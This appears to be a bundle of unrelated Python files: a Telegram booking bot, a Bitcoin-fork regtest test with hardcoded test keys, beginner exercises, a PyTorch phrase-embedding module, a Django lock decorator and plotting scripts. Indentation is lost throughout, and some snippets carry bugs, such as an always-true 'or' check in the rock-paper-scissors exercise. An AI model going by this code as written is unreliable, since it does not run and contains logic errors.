N = [4, 10, 13, 20, 48, 100, 199, 297, 356, 477, 500, 892, 998, 1397, 1452, 1823, 1897, 1943, 2000, 1998]
D = [1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
for i, (n, d) in enumerate(zip(N, D), start=1):
print "(info) Generating 'sequence%s.in'..." % i
sh("./gen.py %s %s > sequence%s.in" % (n, d, i))
print "(info) Generating 'sequence%s.ans'..." % i
sh("./std < sequence%s.in > sequence%s.ans" % (i, i))
|
import logging
from aiogram import types
from aiogram.dispatcher import FSMContext
from aiogram.dispatcher.filters import Command, Text
from aiogram.types import CallbackQuery, Message
from helpers.api import (create_register, ger_or_create_user, get_masters,
get_masters_dates, get_masters_hours,
get_masters_services, get_user)
from helpers.states import OrderTrim
from keyboards.inline.callback_datas import (date_callback, hour_callback,
master_callback, service_callback)
from keyboards.inline.choice_buttons import (get_dates_keyboard,
get_hours_keyboard,
get_masters_keyboard,
get_services_keyboard)
from keyboards.reply_keyboard.choice_buttons import get_share_phone_keyboard
from loader import bot, dp
@dp.message_handler(content_types=['contact'])
async def contact(message: Message, state: FSMContext):
"""
Получает номер телефона
"""
if message.contact is None:
await message.answer("Что-то пошло не так. Давай попробуем еще раз")
return
await message.answer(
'Благодуха, номер получен. Сейчас найдем тебя или создадим новый профиль',
reply_markup=types.ReplyKeyboardRemove(),
)
user = await ger_or_create_user(message.contact, message.chat)
if user:
await message.answer(text=f"Привет, {user['first_name']}")
await state.update_data(user_id=user['id'])
masters = await get_masters()
keyboard = get_masters_keyboard(masters)
await message.answer(text="К кому пойдешь?", reply_markup=keyboard)
await OrderTrim.waiting_for_master.set()
@dp.message_handler(Command("trim"), state='*')
async def order_trim(message: Message, state: FSMContext):
"""
Инициализация записи и выбор мастера
"""
chat_id = getattr(message.chat, 'id')
username = getattr(message.chat, 'username')
user = await get_user(chat_id)
try:
await message.answer(text=f"Привет, {user['first_name']}")
await state.update_data(user_id=user['id'])
masters = await get_masters()
keyboard = get_masters_keyboard(masters)
await message.answer(text="К кому пойдешь?", reply_markup=keyboard)
await OrderTrim.waiting_for_master.set()
except KeyError:
keyboard = get_share_phone_keyboard()
await message.answer(
text=f"Привет, {username}. Похоже, мы впервые тут общаемся. Подскажи свой номер телефона",
reply_markup=keyboard,
)
@dp.callback_query_handler(master_callback.filter(), state=OrderTrim.waiting_for_master)
async def order_date(call: CallbackQuery, callback_data: dict, state: FSMContext):
"""
Установим дату записи
"""
await call.message.edit_reply_markup(reply_markup=None)
master_id = callback_data.get('id')
master_name = callback_data.get('name')
await call.message.answer(f'{master_name} - отличный выбор.')
await state.update_data(master_id=master_id)
await state.update_data(master_name=master_name)
logging.info(f"{callback_data}")
master_dates = await get_masters_dates(master_id)
keyboard = get_dates_keyboard(master_dates)
await call.message.answer(text="На какую дату записать?", reply_markup=keyboard)
await OrderTrim.waiting_for_date.set()
@dp.callback_query_handler(date_callback.filter(), state=OrderTrim.waiting_for_date)
async def order_time(call: CallbackQuery, callback_data: dict, state: FSMContext):
await call.message.edit_reply_markup(reply_markup=None)
entry_date = callback_data.get('entry_date')
date_str = callback_data.get('date_str')
order = await state.get_data()
master_id = order['master_id']
await call.message.answer(f'{date_str}. Запомнил.')
logging.info(f"{callback_data}")
master_hours = await get_masters_hours(master_id, entry_date)
keyboard = get_hours_keyboard(master_hours)
await call.message.answer(text="Во сколько ждать тебя?", reply_markup=keyboard)
await OrderTrim.waiting_for_time.set()
@dp.callback_query_handler(hour_callback.filter(), state=OrderTrim.waiting_for_time)
async def order_service(call: CallbackQuery, callback_data: dict, state: FSMContext):
await call.message.edit_reply_markup(reply_markup=None)
entry_hour = callback_data.get('entry_hour')
working_hour_id = callback_data.get('id')
await state.update_data(working_hour_id=working_hour_id)
order = await state.get_data()
master_id = order['master_id']
await call.message.answer(f'{entry_hour}. Выбор сделан.')
logging.info(f"{callback_data}")
master_services = await get_masters_services(master_id)
keyboard = get_services_keyboard(master_services)
await call.message.answer(text="Что тебе нужно сделать?", reply_markup=keyboard)
await OrderTrim.waiting_for_service.set()
@dp.callback_query_handler(service_callback.filter(), state=OrderTrim.waiting_for_service)
async def order_service(call: CallbackQuery, callback_data: dict, state: FSMContext):
await call.message.edit_reply_markup(reply_markup=None)
price_id = callback_data.get('id')
order = await state.get_data()
working_hour_id = order['working_hour_id']
user_id = order['user_id']
await call.message.answer('Принято. Сейчас запишем...')
logging.info(f"{callback_data}")
check_order = await create_register(user_id, working_hour_id, price_id)
try:
if check_order['state'] == 'new_register':
await call.message.answer('Готово.')
except KeyError:
await call.message.answer(
'Возникла засада с записью. Попробуй чуть позже. Либо позвони Романычу, он все сделает.'
)
|
"""
Play RPS w/Bad Input
"""
p1 = None # can be invalid!
p2 = None # can be invalid!
"""
This is the same as the original RPS problem,
except that cannot expect the input to be valid.
While we *want* `r` or `p` or `s`, there is a possibility
that input can be anything like...
* `ROCK` (all caps)
* `R` (`r` but capitalized)
* `PAPrrRR` (incorrectly spelled, upper/lowercased)
Implement conditional statements that will sanitize the
user input or let user know that input is invalid.
"""
p1 = input('Choose r, p , or s, Player 1: ') # from user input
p2 = input('Choose r, p , or s, Player 2: ') # from user input
##### with data that must be corrected by user
p1 = 'R'
p2 = 'ROCK'
p1 = p1.lower()
p2 = p2.lower()
if p1 == 'r' or 'p' or 's':
val1 = True
else:
print("Player 1, please enter 'r', 'p', or 's' in the correct format.")
if p2 == 'r' or 'p' or 's':
val2 = True
else:
print("Player 2, please enter 'r', 'p', or 's' in the correct format.")
#### with data that can be sanitized
p1 = 'R'
p2 = 'p'
p1 = p1.lower()
p2 = p2.lower()
if p1 == p2:
print(0)
elif p1 == 'r' and p2 == 's':
print(1)
elif p1 == 'r' and p2 == 'p':
print(2)
elif p1 == 'p' and p2 == 's':
print(2)
elif p1 == 'p' and p2 == 'r':
print(1)
elif p1 == 's' and p2 == 'r':
print(2)
elif p1 == 's' and p2 == 'p':
print(1) |
from google_auth import GoogleAuth
key_path = "secrets.json"
scopes = ["https://www.googleapis.com/auth/fitness.activity.read"]
google_auth = GoogleAuth(key_path, scopes)
print(google_auth.get_token())
|
""" DocStrings and Default values of Named Tuples
Default Docs for Named Tuples
""" |
#!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from decimal import Decimal
REGTEST_BIT_PREMINE = 2000
REGTEST_BPQ_PREMINE = 100
PREMINE_PUBKEYS = [
[
"100700000796a8f86cec8db8be05671641473f0464f0e142d177cfbbddf35464a14eefb4577310ac8bc2a4a3b2d01de0f57f4f4441e8d17c9081e9e6288dbd45942e8a231e",
"10070000072f2908f2cd6a09103e2f905c6d71c258b575aeceef8a49774a265e7aa18992dcbed186011828972ec597149f3e9a5f0c7b179181d428045a257096a8a4e98280",
"100700000760c88b3b0b67a4cb81084a64e1e13faf03ad167e8dc632445b4e47ef02a7cfd511f03f8869fe9b5dc43e2305071332b0cb9929563a7f9f3fea89cee93ce26a0c",
],
[
"100700000713bcd90cc2f8cf3ac9f4ab2e78c7e90129ec8d8f74968fc8ea9358e9e70a7e1049730ac52b1f7582513a7eeb09bc081a2b8bd596b2fc0f9f813f649a73bec5a5",
"1007000007df63af45db773341e4316d8226bddc1d4a9bcae08bc287609ab7b0d6b4be687fd45ff1f03c3708a70379f14b39179ce513a1aa3dc40c2f32bfd572f543307ae3",
"10070000078d4687e27cc2ab3347b1fcbb2b73860ea6e2a5e5cff8bf08f72302039f6ee2103aa754f83d2f854006e5d1c78e12f431ab1acf51138b7781b9501814643c09b3",
]
]
PREMINE_KEYS = [
[
"5UknnBacqeaFB1V5K51CvSz2x2TRA2C5g47GRJ4L7XyeZs613o14i8ijtoGbdrgPwpG8SdNz949gAX7u33bNGfSVpa68uj6XmsVsPMtFGafqhXSbmK1pHc5G8ACUVfmGCntSp1wHAtYu1ZvPnQtj7Jfe9Xci7EkMuFzH8DWMQTPBXoA1cBB5fLxY89jBqRztCzGi7BAY",
"5UknnBacpmQf38DbrgmSN1oDj2Rre1KgYEQML2j6DMYyH4xq1vcv222eQjSkczaU1BezzLZNaB19NE9jUhnxTZ6G8bfYWQQr5aek2QsqNPD85rBKBXF2DdDwQcvCvwdP1rQU7ty3wGvMWSUrMK75s38iqATMmoabmo2ySHKS6467NhYycd1e82c771BQPQfc4Y6VpTMz",
"5UknnBacqBwUFP9EKJZDBfmasU7Si2T9htowHSoLUBHpauZxoDpUGCYzFuXBSVp8cgE234WEwg61D1uiEZfGDGgstEpTCH4EL6iDTVX6giakFiVB5gVuY9Ea8vqaQgk9h9enVh7j8CfBZRZJwmgyRRL5jjebDNgnEbeWrUkgxuTF3JDjMXDKbH3Yk5kwgAwqfjd4tiSr",
],
[
"5UknnBacpXrPEFSnqn4TnpwvaPn1UFsLzABAyvLJoeehoE32SLteEJJFmnGzv9AvQDgLHZfUb1xoA7uSFHAXd2w446Z6N5f4nnaZiPt3wKnFKhArY3BYCi4MnjMRBDyAvsjahdmAWSTok6X82LEtVBRerCNnT7ocB5erSjSAGZHS56oSoFUE2NuLDeE5BKqm2WLXS5Sb",
"5UknnBacrGXa8EBVjSaF5ni7QL2HhxtxoLCFngSzb9Djubmtrqy3JbucTL52AAn1gWbNNo5vX1JA7dnpExg2Nu3BBaN2h1Zuj3oxkTCVih4xjcUfFHTbnKMvEGwkmAKdz1BEackTKH5yMyCv5NgUNqgFcidYpGHsaMmGJ9KfhZPfbTWGcusGRixpvpfFqLCH1rxZCyoY",
"5UknnBacqZwAhHe4WPCnQemh5GewFMUPxmrhiwC7jNUTtYTPcsFA1wjF96EiXLsWnELWAvafyVhnA9Y9YYZQUivftV2UYLFrJy1hkBcPh6UCL5j3VGwYgs9po2pHEi8qF1XELJRVpULijRipPUzKGGUmcezQsMpVJS8CdDxXkcSo1TSnqLo98JriSPDifqmmVC2kY51z",
]
]
class BpqTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
self.setup_clean_chain = True
def setup_network(self):
self.setup_nodes()
connect_nodes_bi(self.nodes, 0, 1)
connect_nodes_bi(self.nodes, 1, 2)
connect_nodes_bi(self.nodes, 0, 2)
connect_nodes_bi(self.nodes, 0, 3)
def create_bitcoin_addr(self):
result = self.nodes[3].getbalance()
self.log.info("nodes[3] balance: %s", result)
self.addr_L21 = self.nodes[2].getnewaddress("L21", "legacy")
self.log.info("nodes[2] addr_L21: %s", self.addr_L21)
self.nodes[3].sendtoaddress(self.addr_L21, 200.0, "", "", True)
pass
def make_premine(self):
self.log.info("Bitcoin premine...")
bitcoin_coinbase_addr = self.nodes[3].getnewaddress("", "legacy")
bitcoin_blocks_count = REGTEST_BIT_PREMINE
for i in range(200 // 50):
peer = i % self.num_nodes
self.nodes[peer].generatetoaddress(50, bitcoin_coinbase_addr)
self.sync_all()
bitcoin_blocks_count -= 200
self.create_bitcoin_addr()
for i in range(bitcoin_blocks_count // 50):
peer = i % self.num_nodes
self.nodes[peer].generatetoaddress(50, bitcoin_coinbase_addr)
self.sync_all()
self.log.info("BPQ premine...")
for i in range(REGTEST_BPQ_PREMINE // 10):
peer = i % self.num_nodes
self.nodes[peer].generate(10)
self.sync_all()
def create_spend_tx(self, node, block_n, redeemScript, out_address):
blockId = self.nodes[0].getblockhash(REGTEST_BIT_PREMINE+1)
block = self.nodes[0].getblock(blockId)
txId = block['tx'][0]
#self.log.info("spending tx: %s", txId)
rawTx = node.gettransaction(txId)
#self.log.info("rawTx: %s", rawTx)
decTx = node.decoderawtransaction(rawTx['hex'])
#self.log.info("decTx: %s", decTx)
vout = decTx['vout'][0]
#self.log.info("value: %s", vout['value'])
from_address = node.validateaddress(vout['scriptPubKey']['addresses'][0])
#self.log.info("from_address: %s", from_address)
inputs = [{
"txid" : txId,
"vout" : vout['n'],
"scriptPubKey" : vout['scriptPubKey']['hex'],
"redeemScript" : redeemScript,
"amount" : vout['value']
}]
amount = (vout['value'] * Decimal('0.9')).quantize(Decimal('0.00000001'))
outputs = { out_address : amount }
rawTx = node.createrawtransaction(inputs, outputs)
return rawTx, inputs, amount
def spend_premine_test(self):
# premine_addr_0['address']
# premine_addr_0['redeemScript']
premine_addr_0 = self.nodes[3].createmultisig(2, PREMINE_PUBKEYS[0] )
premine_addr_1 = self.nodes[3].createmultisig(2, PREMINE_PUBKEYS[1] )
self.log.info("premine_addr_0: %s", premine_addr_0['address'])
self.log.info("premine_addr_1: %s", premine_addr_1['address'])
self.nodes[0].importaddress(premine_addr_0['address'], "premine0")
self.nodes[0].importaddress(premine_addr_1['address'], "premine1")
addr_0 = self.nodes[0].validateaddress(self.nodes[0].getnewaddress("addr_0"))
addr_1 = self.nodes[1].validateaddress(self.nodes[1].getnewaddress("addr_1"))
addr_2 = self.nodes[2].validateaddress(self.nodes[2].getnewaddress("addr_2"))
# create transaction
rawTx, inputs, amount_0 = self.create_spend_tx(self.nodes[0], REGTEST_BIT_PREMINE+1,
premine_addr_0['redeemScript'], addr_0['address'])
#self.log.info("Tx inputs: %s", inputs)
#self.log.info("decTx: %s", self.nodes[0].decoderawtransaction(rawTx))
# sign 1
rawTxPartialSigned = self.nodes[0].signrawtransaction(rawTx, inputs, [
{ "key" : PREMINE_KEYS[0][0], "index": 1 }])
#self.log.info("rawTxPartialSigned: %s", rawTxPartialSigned)
assert_equal(rawTxPartialSigned['complete'], False)
rawTx = rawTxPartialSigned['hex']
#self.log.info("decTxPartialSigned: %s", self.nodes[0].decoderawtransaction(rawTxPartialSigned['hex']))
assert_equal(rawTxPartialSigned['complete'], False)
# sign 2
rawTxPartialSigned = self.nodes[1].signrawtransaction(rawTx, inputs, [
{ "key" : PREMINE_KEYS[0][1], "index": 1 }])
#self.log.info("rawTxPartialSigned: %s", rawTxPartialSigned)
assert_equal(rawTxPartialSigned['complete'], True)
rawTx = rawTxPartialSigned['hex']
# send transaction
spendTx0 = self.nodes[3].sendrawtransaction(rawTx)
self.nodes[3].generate(6)
self.sync_all()
result = self.nodes[0].getbalance()
#self.log.info("node0 balance: %s", result)
assert_equal(result, amount_0)
pass
def first_transaction_test(self):
self.addr_Q01 = self.nodes[0].getnewaddress("Q01")
self.log.info("addr_Q01: %s", self.addr_Q01)
result = self.nodes[2].getbalance()
self.log.info("node[2] balance: %s", result)
result = self.nodes[2].listaccounts()
self.log.info("node[2] accounts: %s", result)
self.nodes[2].sendfrom("L21", self.addr_Q01, 50.0)
self.sync_all()
self.nodes[3].generate(6)
self.sync_all()
pass
def reject_bitcoin_test(self):
addr_L31 = self.nodes[3].getnewaddress("L31", "legacy")
#self.nodes[3].sendtoaddress(addr_L31, 1.0)
assert_raises_rpc_error(-4, "Transaction must contain only BPQ outputs",
self.nodes[3].sendtoaddress, addr_L31, 1.0)
addr_Q31 = self.nodes[3].getnewaddress("Q31")
self.nodes[3].sendtoaddress(addr_Q31, 1.0)
def run_test(self):
self.make_premine()
self.nodes[1].generate(1)
self.nodes[2].generate(1)
self.nodes[3].generate(1)
self.reject_bitcoin_test()
self.sync_all()
self.spend_premine_test()
self.first_transaction_test()
pass
if __name__ == '__main__':
BpqTest().main()
|
from django.contrib.auth.forms import AuthenticationForm
class LoginForm(AuthenticationForm):
pass |
name=input('Enter your name to costomize your personal Maths quiz decathlon:')
print(name,"""'s Maths quiz decathlon
Answer as many questions as possible to attain the maximum points""")
print('''USERS MANUAL
OPERATORS:
+ ==- ADDITION
- ==- SUBSTRACTION
x ==- MULTIPLICATION
/ ==- DIVISION''')
respond=input('Are you ready to do some Maths?(Yes or No):')
correct_response=['Yes','yes','Yes ','yes ',' Yes',' yes']
score_sheet=0
if respond in correct_response:
print("Let's get our Maths pants on!")
print('Test begins after countdown')
import time
def countdown(t):
while t:
mins, secs = divmod(t, 60)
timer = '{:02d}:{:02d}'.format(mins, secs)
print(timer, end="\r")
time.sleep(1)
t -= 1
t = 3
countdown(int(t))
emoji=chr(9786)
for i in range(10):
import random
num_1=random.randint(-100,100)
num_2=random.randint(1,10)
import random
list_of_operators=['plus','minus','multiplied by','divided by']
operator=random.choice(list_of_operators)
print('Compute ({}) {} ({})' .format(num_1,operator,num_2))
if operator==list_of_operators[0]:
answer_1=num_1+num_2
user_reply=int(input('Enter your answer here:'))
if operator==list_of_operators[1]:
answer_1=num_1-num_2
user_reply=int(input('Enter your answer here:'))
elif operator==list_of_operators[2]:
answer_1=num_1*num_2
user_reply=int(input('Enter your answer here:'))
elif operator==list_of_operators[3]:
answer_2=num_1/num_2
answer_1=round(answer_2, 2)
user_reply=float(input('Enter your answer here:'))
if answer_1==user_reply:
score_sheet=score_sheet+10
print("Excellent job!.You're a genius")
#for i in range(10):
print('You have {} points!' .format(score_sheet))
else:
print('That is incorrect!')
print('The right answer is',answer_1)
print("You've failed the math quiz decathlon.")
print('Try again later!')
print('Your final score is {} {}' .format(score_sheet,emoji))
break
else:
print("Let's try again some other time")
|
#!/usr/bin/env python3
from distutils.core import setup
from distutils.extension import Extension
from Cython import __version__
from Cython.Distutils import build_ext
#from Cython.Build import cythonize
import numpy as np
from LoLIM.utilities import GSL_include, GSL_library_dir
from Cython.Compiler.Options import get_directive_defaults
directive_defaults = get_directive_defaults()
CT=[]
# CT =[('CYTHON_TRACE', '1')]
# directive_defaults['linetrace'] = True
# directive_defaults['binding'] = True
# directive_defaults['profile'] = True
print('cython version', __version__ )
# ext = Extension("cython_beamforming_tools", ["cython_beamforming_tools.pyx"],
# include_dirs=[np.get_include(),
# GSL_include()],
# library_dirs=[GSL_library_dir()],
# libraries=["gsl", 'blas'],
# define_macros=CT
# )
#
# setup(ext_modules=[ext],
# cmdclass = {'build_ext': build_ext})
print()
print()
ext_CT = Extension("cython_beamforming_tools_centerT", ["cython_beamforming_tools_centerT.pyx"],
include_dirs=[np.get_include(),
GSL_include()],
library_dirs=[GSL_library_dir()],
libraries=["gsl", 'blas'],
define_macros=CT
)
setup(ext_modules=[ext_CT],
cmdclass = {'build_ext': build_ext})
|
from Ex0109 import moeda
p = float(input('Digite o preço: R$ '))
print(f'A metade de {(moeda.moeda(p))} é {(moeda.metade(p, True))}')
print(f'O dobro de {(moeda.moeda(p))} é {(moeda.dobro(p, True))}')
print(f'Aumentando em 10%, temos {(moeda.aumentar(p, 10, True))}')
print(f'Reduzindo em 13%, temos {(moeda.diminuir(p, 13, True))}')
|
from __future__ import print_function
# pylint: disable=pointless-string-statement, line-too-long
import logging
import tempfile
import time
import traceback
from lockfile import FileLock, AlreadyLocked, LockTimeout
import arrow
from django.conf import settings
from django.utils.text import slugify
"""
Decorators for wrapping existing Django management commands for use within the
Quicksilver task execution system.
"""
def add_qs_arguments(handle):
def wrapper(self, parser):
parser.add_argument('--qs-context', dest='_qs_context', default=True, required=False)
parser.add_argument('--qs-next-interval', dest='_qs_next_interval', type=int, default=5, required=False)
handle(self, parser)
return wrapper
def handle_schedule(handle):
def wrapper(self, *args, **options):
invoked_by_qs = False
if '_qs_context' in options:
invoked_by_qs = options['_qs_context']
del options['_qs_context']
next_interval = None
if '_qs_next_interval' in options:
next_interval = options['_qs_next_interval']
del options['_qs_next_interval']
handle(self, *args, **options)
if invoked_by_qs:
if next_interval is not None:
print('_qs_next_run: ' + arrow.get().shift(seconds=next_interval).isoformat())
return wrapper
# Lock timeout value - how long to wait for the lock to become available.
# Default behavior is to never wait for the lock to be available (fail fast)
LOCK_WAIT_TIMEOUT = getattr(settings, "DEFAULT_LOCK_WAIT_TIMEOUT", -1)
def handle_lock(handle):
"""
Decorate the handle method with a file lock to ensure there is only ever
one process running at any one time.
"""
def wrapper(self, *args, **options):
lock_prefix = ''
try:
lock_prefix = settings.SITE_URL.split('//')[1].replace('/', '').replace('.', '-')
except AttributeError:
try:
lock_prefix = settings.ALLOWED_HOSTS[0].replace('.', '-')
except IndexError:
lock_prefix = 'qs_lock'
lock_suffix = ''
if 'task_queue' in options:
lock_suffix = '_' + options.get('task_queue')
lock_prefix = slugify(lock_prefix)
lock_suffix = slugify(lock_suffix)
start_time = time.time()
verbosity = options.get('verbosity', 0)
if verbosity == 0:
level = logging.ERROR
elif verbosity == 1:
level = logging.WARN
elif verbosity == 2:
level = logging.INFO
else:
level = logging.DEBUG
logging.basicConfig(level=level, format="%(message)s")
logging.debug("-" * 72)
lock_name = self.__module__.split('.').pop()
lock_filename = '%s/%s__%s__%s' % (tempfile.gettempdir(), lock_prefix, lock_name, lock_suffix) # pylint: disable=consider-using-f-string
while lock_filename.endswith('_'):
lock_filename = lock_filename[:-1]
lock = FileLock(lock_filename)
logging.debug("%s - acquiring lock...", lock_name)
try:
lock.acquire(LOCK_WAIT_TIMEOUT)
except AlreadyLocked:
logging.debug("lock already in place. quitting.")
return
except LockTimeout:
logging.debug("waiting for the lock timed out. quitting.")
return
logging.debug("acquired.")
try:
handle(self, *args, **options)
except: # pylint: disable=bare-except
logging.error("Command Failed")
logging.error('==' * 72)
logging.error(traceback.format_exc())
logging.error('==' * 72)
logging.debug("releasing lock...")
lock.release()
logging.debug("released.")
logging.info("done in %.2f seconds", (time.time() - start_time))
return
return wrapper
|
from pypokerengine.api.game import setup_config, start_poker
from RanomPlayer import RandomPlayer
# Game general configuration
config = setup_config(max_round=10, initial_stack=100, small_blind_amount=5)
# Define AI players
config.register_player(name="p1", algorithm=RandomPlayer())
config.register_player(name="p2", algorithm=RandomPlayer())
# Start Poker game
game_result = start_poker(config, verbose=1)
|
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
# @Time : 2019-06-16 14:32
# @Author : Yongfei Liu
# @Email : liuyf3@shanghaitech.edu.cn
import torch
import torch.nn as nn
from maskrcnn_benchmark.config import cfg
import json
import numpy as np
class PhraseEmbeddingSent(torch.nn.Module):
def __init__(self, cfg, phrase_embed_dim=1024, bidirectional=True):
super(PhraseEmbeddingSent, self).__init__()
self.phrase_select_type = 'Mean'
vocab_file = open(cfg.MODEL.VG.VOCAB_FILE)
self.vocab = json.load(vocab_file)
vocab_file.close()
self.vocab_to_id = {v:i+1 for i,v in enumerate(self.vocab)}
self.embed_dim = phrase_embed_dim
self.hidden_dim = self.embed_dim//2
self.embedding = nn.Embedding(num_embeddings=len(self.vocab_to_id) + 1,
embedding_dim=self.embed_dim,
padding_idx=0, # -> first_dim = zeros
sparse=False)
self.sent_rnn = nn.GRU(input_size=self.embed_dim,
hidden_size=self.hidden_dim,
num_layers=1,
batch_first=True,
dropout=0,
bidirectional=True)
if cfg.MODEL.RELATION.INTRA_LAN:
self.rel_rnn = nn.GRU(input_size=self.embed_dim,
hidden_size=self.hidden_dim,
num_layers=1,
batch_first=True,
dropout=0,
bidirectional=True)
def forward(self, all_sentences, all_phrase_ids, all_sent_sgs, device_id):
batch_phrase_ids = []
batch_phrase_types = []
batch_phrase_embed = []
batch_rel_phrase_embed = []
batch_relation_conn = []
batch_word_embed = []
batch_word_to_graph_conn = []
for idx, sent in enumerate(all_sentences): # all_sentence: [b, dict] for one caption ; all_phrase_ids: [b, max_phrase_num] which is the phrase have the bbox annotation; all_sent_sgs: [b, relation_num, 3]
seq = sent['sentence'].lower()
phrases = sent['phrases']
phrase_ids = []
phrase_types = []
input_phr = []
lengths = []
phrase_embeds_list = []
valid_phrases = filter_phrase(phrases, all_phrase_ids[idx]) # valid_phrases are the phrase which have the bbox annotation
tokenized_seq = seq.split(' ')
input_seq_idx = []
for w in tokenized_seq:
input_seq_idx.append(self.vocab_to_id[w]) # self.vocab_to_ids is a dict record all word in caption
input_seq_idx = torch.LongTensor(input_seq_idx).to(device_id) # input_seq_idx: [word_num]
seq_embeds = self.embedding(input_seq_idx) # seq_embeds: [word_num, embedding_dim]
seq_embeds, _ = self.sent_rnn(seq_embeds.unsqueeze(0)) # seq_embeds: [1, word_num, 2*hidden_dim]
word_to_graph_conn = np.zeros((len(valid_phrases), seq_embeds.shape[1]))
for pid, phr in enumerate(valid_phrases): # word_to_graph_conn: [valid_phrase_num, word_num] means the position of each phrase in the caption
phrase_ids.append(phr['phrase_id'])
phrase_types.append(phr['phrase_type'])
tokenized_phr = phr['phrase'].lower().split(' ')
phr_len = len(tokenized_phr)
start_ind = phr['first_word_index']
if self.phrase_select_type == 'Mean':
phrase_embeds_list.append(torch.mean(seq_embeds[:, start_ind:start_ind+phr_len, :], 1))
elif self.phrase_select_type == 'Sum':
phrase_embeds_list.append(torch.sum(seq_embeds[:, start_ind:start_ind+phr_len, :], 1))
else:
raise NotImplementedError
lengths.append(phr_len)
input_phr.append(tokenized_phr) # input_phr: [valid_phrase_num,] in which is the list store the tokenized phrase
word_to_graph_conn[pid, start_ind:start_ind+phr_len] = 1
phrase_embeds = torch.cat(tuple(phrase_embeds_list), 0) # phrase_embeds: [valid_phrase_num, 2*hidden_dim]
batch_word_embed.append(seq_embeds[0]) # batch_word_embed: [b, word_num, 2*hidden_dim]
batch_phrase_ids.append(phrase_ids) # batch_phrase_ids: [b, valid_phrase_num] string
batch_phrase_types.append(phrase_types) # batch_phrase_types: [b, valied_phrase_num] string
batch_phrase_embed.append(phrase_embeds) # batch_phrase_embed: [b, valied_phrase_num, 2*hidden_dim]
batch_word_to_graph_conn.append(word_to_graph_conn) # batch_word_to_graph_conn: [b, valid_phrase_num, word_num]
if cfg.MODEL.RELATION.INTRA_LAN:
"""
rel phrase embedding
"""
# get sg
sent_sg = all_sent_sgs[idx]
relation_conn = [] # relation_conn: [valid_relation_num, 3]
rel_lengths = []
input_rel_phr = []
input_rel_phr_idx = []
for rel_id, rel in enumerate(sent_sg):
sbj_id, obj_id, rel_phrase = rel
if sbj_id not in phrase_ids or obj_id not in phrase_ids:
continue
relation_conn.append([phrase_ids.index(sbj_id), phrase_ids.index(obj_id), rel_id])
uni_rel_phr_idx = torch.zeros(len(tokenized_seq)+5).long()
tokenized_phr_rel = rel_phrase.lower().split(' ')
if cfg.MODEL.RELATION.INCOR_ENTITIES_IN_RELATION:
tokenized_phr_rel = input_phr[phrase_ids.index(sbj_id)] + tokenized_phr_rel + input_phr[
phrase_ids.index(obj_id)]
rel_phr_idx = [] # tokenized_phr_rel: list, the tokens of relation phrase(maybe can incoperate the subject and object phrase)
for w in tokenized_phr_rel:
rel_phr_idx.append(self.vocab_to_id[w])
rel_phr_len = len(tokenized_phr_rel)
rel_lengths.append(rel_phr_len)
input_rel_phr.append(tokenized_phr_rel)
uni_rel_phr_idx[:rel_phr_len] = torch.Tensor(rel_phr_idx).long()
input_rel_phr_idx.append(uni_rel_phr_idx) # input_rel_phr_idx: list, the relation phrase index in caption vocab
if len(relation_conn) > 0:
input_rel_phr_idx = torch.stack(input_rel_phr_idx) # input_rel_phr_idx: [valid_relation_num, max_relation_len]
rel_phrase_embeds = self.embedding(input_rel_phr_idx.to(device_id))
rel_phrase_embeds, _ = self.rel_rnn(rel_phrase_embeds)
rel_phrase_embeds = select_embed(rel_phrase_embeds, lengths=rel_lengths, select_type=self.phrase_select_type) # rel_phrase_embeds: [valid_relation_num, 1]
batch_rel_phrase_embed.append(rel_phrase_embeds)
else:
batch_rel_phrase_embed.append(None) # batch_rel_phrase_embed: [b, valid_relation_num, 1]
batch_relation_conn.append(relation_conn) # batch_relation_conn: [b, valid_relation_num,3]
return batch_phrase_ids, batch_phrase_types, batch_word_embed, batch_phrase_embed, batch_rel_phrase_embed, batch_relation_conn, batch_word_to_graph_conn
def filter_phrase(phrases, all_phrase):
phrase_valid = []
for phr in phrases:
if phr['phrase_id'] in all_phrase:
phrase_valid.append(phr)
return phrase_valid
def select_embed(x, lengths, select_type=None):
batch_size = x.size(0)
mask = x.data.new().resize_as_(x.data).fill_(0)
for i in range(batch_size):
# if select_type == 'last':
# mask[i][lengths[i] - 1].fill_(1)
if select_type == 'Mean':
mask[i][:lengths[i]].fill_(1/lengths[i])
elif select_type == 'Sum':
mask[i][:lengths[i]].fill_(1)
else:
raise NotImplementedError
x = x.mul(mask)
x = x.sum(1).view(batch_size, -1)
return x
def specific_word_replacement(word_list):
"""
:param word_list: ["xxx", "xxx", "xxx"]
:return: new word_list: ["xxx", 'xxx', 'xxx']
"""
new_word_list = []
for word in word_list:
if word in left_word_dict:
word = word.replace('left', 'right')
elif word in right_word_dict:
word = word.replace('right', 'left')
new_word_list.append(word)
return new_word_list
|
# %% Imports
import pandas
import bar_chart_race as bcr
from matplotlib import colors
# %% Load data from PHE API and transform it to the right format
df = pandas.read_csv('https://api.coronavirus.data.gov.uk/v2/data?areaType=nation&metric=cumVaccinationFirstDoseUptakeByPublishDatePercentage&metric=cumVaccinationSecondDoseUptakeByPublishDatePercentage&format=csv')
df.drop(columns=['areaType','areaCode'], inplace=True)
df.rename(columns={'cumVaccinationFirstDoseUptakeByPublishDatePercentage':' 1st dose','cumVaccinationSecondDoseUptakeByPublishDatePercentage':' 2nd dose'},inplace=True)
df = df.melt(id_vars=['date','areaName'], var_name='dose')
df['metric'] = df['areaName'] + df['dose']
df.drop(columns=['areaName','dose'],inplace=True)
df = df.pivot(index='date', columns='metric', values='value')
# Duplicate last row so it displays
df = pandas.concat([df,pandas.DataFrame(df[-1:].values, index=[df.index.max()], columns=df.columns)])
# %% Build the bar chart race, with suitable country colours
# %%
from matplotlib import rcParams
rcParams['font.family'] = 'sans-serif'
cmap = colors.ListedColormap(['white', 'white', '#076543', '#076543', '#005eb8', '#005eb8', '#D30731', '#D30731'])
bcr.bar_chart_race(
df,
title=r'COVID-19 vaccination progress (% of adults) in the UK',
filename=None,
steps_per_period=10,
figsize=(16,9),
dpi=240,
title_size=28,
bar_label_size=24,
tick_label_size=24,
period_label={'x': .99, 'y': .25, 'ha': 'right', 'va': 'center', 'size': 22},
cmap=cmap)
|
# bot.py from https://realpython.com/how-to-make-a-discord-bot-python/
import os
import random
import discord
from dotenv import load_dotenv
load_dotenv()
